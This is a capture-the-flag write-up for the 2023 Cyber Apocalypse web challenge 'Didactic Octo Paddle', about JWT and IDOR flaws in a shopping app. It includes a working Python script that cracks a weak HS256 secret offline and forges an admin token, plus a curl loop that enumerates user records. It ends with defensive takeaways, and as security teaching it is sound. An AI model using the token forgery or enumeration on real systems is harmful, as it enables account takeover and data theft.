2023 Cyber Apocalypse: Didactic Octo Paddle

Challenge Information

Attribute   Details
Event       2023 Cyber Apocalypse
Category    Web
Challenge   Didactic Octo Paddle

Summary

This challenge features a shopping application with JWT-based authentication and several vulnerabilities: IDOR (Insecure Direct Object Reference), weak JWT secrets, and improper access controls. The goal is to exploit these to access admin resources.


Analysis

Application endpoints:

  • GET / - Home page with product list
  • GET/POST /register - User registration
  • GET/POST /login - User authentication with JWT
  • GET /cart - View shopping cart
  • POST /add-to-cart/:item - Add item
  • POST /remove-from-cart/:item - Remove item
  • GET /admin - Admin page (requires admin role)

JWT Structure:

Header: {"alg":"HS256","typ":"JWT"}
Payload: {"id":2,"iat":1679241150,"exp":1679244750}
Signature: 9oI6U-J09Nlq2c5G2raESd-8Ska1j7wH9SNjJFE-8I4

Vulnerabilities:

  1. The JWT is HS256-signed with a potentially weak or default secret, which can be recovered offline
  2. User IDs are small sequential integers and are exposed in the JWT payload
  3. Per-user endpoints do not verify that the requested resource belongs to the authenticated user
  4. Admin status may be read from the JWT payload rather than from the server-side user record, so it becomes forgeable once the token can be re-signed

Solution

Approach 1: JWT Manipulation

  1. Register a user and obtain a JWT token

  2. Decode the JWT payload:

    eyJpZCI6MiwiaWF0IjoxNjc5MjQxMTUwLCJleHAiOjE2NzkyNDQ3NTB9
    Decodes to: {"id":2,"iat":1679241150,"exp":1679244750}
  3. Modify the payload to add "is_admin":1, or change id to 1 (the first account created is normally the admin)

  4. Re-sign the modified header and payload. If the secret is weak, recover it offline first by testing wordlist candidates against the existing signature; this never touches the server, so there is no rate limiting or logging to worry about
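As an added example (not code from the original writeup or the challenge), the script below carries Approach 1 through end to end with the standard library only: decode the token without verification, recover a weak HS256 secret by testing candidates against the signature, forge a token with id=1 and is_admin=1, and confirm it passes the same verification the server would run. The sample token, the wordlist and the secret "secret" are constructed here so the script runs offline; they are not the challenge's real values.

```python
"""Offline HS256 secret recovery and JWT forgery (added example, stdlib only)."""
from __future__ import annotations

import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    # JWT strips padding; restore it before decoding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the signing input."""
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str) -> tuple[dict, dict]:
    """Read header and claims without checking the signature (what an attacker does first)."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def verify_hs256(token: str, secret: bytes) -> dict | None:
    """Return the claims if the signature is valid under `secret`, else None.

    Pins the algorithm to HS256 so alg=none or algorithm-confusion tokens fail
    before any signature comparison; compares in constant time.
    """
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def crack_secret(token: str, wordlist) -> bytes | None:
    """Try each candidate secret against the token's own signature; purely offline."""
    for candidate in wordlist:
        secret = candidate.encode()
        if verify_hs256(token, secret) is not None:
            return secret
    return None


def forge_admin_token(token: str, secret: bytes) -> str:
    """Keep the original header and expiry, but impersonate user 1 and add an admin claim."""
    header, payload = decode_unverified(token)
    payload = dict(payload, id=1, is_admin=1)
    return sign_hs256(header, payload, secret)


# Constructed sample with the same claim shape as the challenge token (id/iat/exp),
# signed with a deliberately weak secret so the crack below succeeds offline.
SAMPLE_SECRET = b"secret"  # assumption for the demo, not the challenge's secret
SAMPLE_TOKEN = sign_hs256(
    {"alg": "HS256", "typ": "JWT"},
    {"id": 2, "iat": 1679241150, "exp": 1679244750},
    SAMPLE_SECRET,
)

# Constructed mini wordlist; against a real target use a proper JWT-secret list.
WORDLIST = ["password", "admin", "changeme", "secret", "jwt_secret"]

if __name__ == "__main__":
    print("unverified claims:", decode_unverified(SAMPLE_TOKEN)[1])
    secret = crack_secret(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", secret)
    if secret is not None:
        forged = forge_admin_token(SAMPLE_TOKEN, secret)
        print("forged token:", forged)
        print("server-side verification of forged token:", verify_hs256(forged, secret))
```

The interesting point is the last line: once the secret is known, the forged token is indistinguishable from a legitimate one, so the only defence is a strong secret plus reading the role from the user record rather than from the claims.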

Approach 2: IDOR Exploitation

Request the same per-user resource with other users' IDs. The /api/user/:id path below stands in for whichever per-user route the application exposes; it is not among the routes listed in the Analysis section:

GET /api/user/1 # Admin user
GET /api/user/2 # Current user
GET /api/user/3 # Another user

If the server only checks that the token is valid and never checks that the requested ID matches the ID in the token, you can read other users' data, including the admin's.

Approach 3: ID Enumeration

Because IDs are small sequential integers, a per-user endpoint with no ownership check can be walked end to end. This matters most when the returned records hold credentials or other sensitive data:

# JWT holds the session token obtained after login; -s silences progress output,
# -w appends the status code so denied and missing IDs are easy to tell apart
for i in $(seq 1 100); do
  curl -s -H "Cookie: session=$JWT" -w " [%{http_code}]\n" "http://target/api/user/$i"
done

Key Takeaways

  • IDOR occurs when an application authenticates the caller but never checks that the caller is allowed to touch the specific object requested
  • JWT signing secrets must be long and random; a dictionary word can be recovered offline from a single token
  • JWT payloads are only base64-encoded, not encrypted, so they must not carry sensitive information
  • Unpredictable identifiers (such as UUIDs) raise the cost of enumeration, but are no substitute for authorization checks
  • Always validate that the authenticated user owns the resource being accessed
  • Role and admin status should be looked up server-side on every request, never trusted from token claims the client can re-sign
  • Authorization must be enforced on every endpoint, not only on the obvious admin pages